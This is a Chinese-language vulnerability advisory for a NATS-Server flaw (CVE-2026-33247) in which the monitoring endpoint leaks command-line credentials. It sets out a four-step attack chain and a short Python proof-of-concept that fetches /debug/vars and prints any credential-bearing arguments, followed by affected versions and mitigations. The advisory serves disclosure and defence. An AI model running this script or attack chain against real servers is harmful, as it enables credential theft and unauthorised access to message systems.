CVE-2026-33247 CVSS 7.4 高危

CVE-2026-33247 NATS-Server凭据泄露漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33247

漏洞类型

信息泄露

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NATS-Server

漏洞概述

NATS-Server是NATS.io的高性能云原生消息系统。在2.11.15和2.12.6版本之前，存在一个严重的信息泄露漏洞。当管理员通过命令行参数为所有客户端配置静态凭据，并启用了监控端口时，`/debug/vars`端点会直接输出未经过滤的启动参数。这使得任何能够访问监控端口的攻击者均可窃取敏感的管理员或客户端凭据，进而冒充合法用户访问消息系统，造成数据泄露或完整性破坏。

技术细节

该漏洞源于NATS-Server在处理启动参数时的信息管控不当。当管理员通过命令行参数配置静态凭据（如用户名和密码）时，这些敏感信息被保留在进程的启动参数列表中。NATS-Server内置的HTTP监控服务（默认端口8222）提供了一个`/debug/vars`端点，该端点利用Go语言的`expvar`标准库，旨在暴露服务器的运行时统计指标。然而，在受影响版本中，该端点直接输出了包含完整启动命令的`cmdline`或`argv`字段，且未对敏感字段进行掩码处理。攻击者无需通过NATS协议认证，仅需扫描并发现开放的监控端口，即可发送简单的HTTP GET请求获取该端点数据。解析返回的JSON响应后，攻击者可提取出明文认证凭据。由于CVSS评分中完整性影响为高，获取凭据后，攻击者可完全接管客户端权限，发布非法指令，篡改消息内容，严重威胁云原生边缘架构的安全性。

攻击链分析

STEP 1

信息收集

攻击者扫描目标网络，寻找开放的NATS-Server监控端口（默认为8222）。

STEP 2

访问端点

向发现的监控端口发送HTTP GET请求，访问`/debug/vars`端点。

STEP 3

提取凭据

解析返回的JSON数据，定位`cmdline`或`argv`字段，从中提取明文的用户名和密码。

STEP 4

利用漏洞

使用获取到的凭据连接到NATS-Server服务，进行未授权的消息读取、发布或管理操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target URL with the monitoring port (default is 8222)
target_url = "http://<target-ip>:8222/debug/vars"

try:
    # Send a GET request to the vulnerable endpoint
    response = requests.get(target_url, timeout=5)

    if response.status_code == 200:
        data = response.json()
        # The command line arguments (argv) are usually stored under 'cmdline' or similar keys
        # in the expvar output. Look for credentials in the returned data.
        print("[*] Response received. Parsing for credentials...")
        print(json.dumps(data, indent=2))
        
        # Example check for cmdline in the output structure
        if 'cmdline' in data:
            print(f"[*] Command line arguments found: {data['cmdline']}")
    else:
        print(f"[-] Failed to retrieve data. Status code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

NATS-Server < 2.11.15

NATS-Server >= 2.12.0, < 2.12.6

防御指南

临时缓解措施

建议用户立即升级NATS-Server至修复版本。若无法立即升级，请务必将命令行参数中的凭据迁移至配置文件中，并确保配置文件权限受限。同时，切勿将监控端口暴露在公网，建议通过防火墙规则严格限制访问来源，或直接禁用监控功能以防止凭据泄露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表